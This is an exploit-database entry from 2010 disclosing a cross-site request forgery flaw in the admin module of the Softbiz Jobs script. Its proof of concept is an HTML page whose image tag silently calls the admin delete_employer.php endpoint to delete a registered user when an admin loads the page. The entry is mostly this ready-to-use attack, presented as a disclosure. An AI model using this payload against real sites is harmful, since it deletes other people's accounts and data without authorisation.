Softbiz Jobs CSRF Vulnerability

2010-02-23T00:00:00
ID 1337DAY-ID-11037
Type zdt
Reporter Pratul Agrawal
Modified 2010-02-23T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================
Softbiz Jobs CSRF Vulnerability
===============================

                     =======================================================================
  
                                         Softbiz Jobs CSRF Vulnerability
                     =======================================================================
  
                                                     by
  
                                               Pratul Agrawal
  
  
# Vulnerability found in- Admin module
  
# company       aksitservices
  
# Credit by     Pratul Agrawal
 
# Download      http://www.softbizscripts.com/
 
# Script        softbizscripts
 
  
  
# Proof of concept
 
Script to delete the registered user through Cross Site request forgery
 
             ...................................................................................................................
 
                        <html>
 
                          <body>
 
                              <img src=http://server/scripts/seojobs/admin/delete_employer.php?id=[USER ID] />
 
                          </body>
 
                        </html>
 
 
             ...................................................................................................................
 
 
 
After execution refresh teh page and u can see that user having id=20 get deleted automatically.
 
  
#If you have any questions, comments, or concerns, feel free to contact me. 



#  0day.today [2018-01-06]  #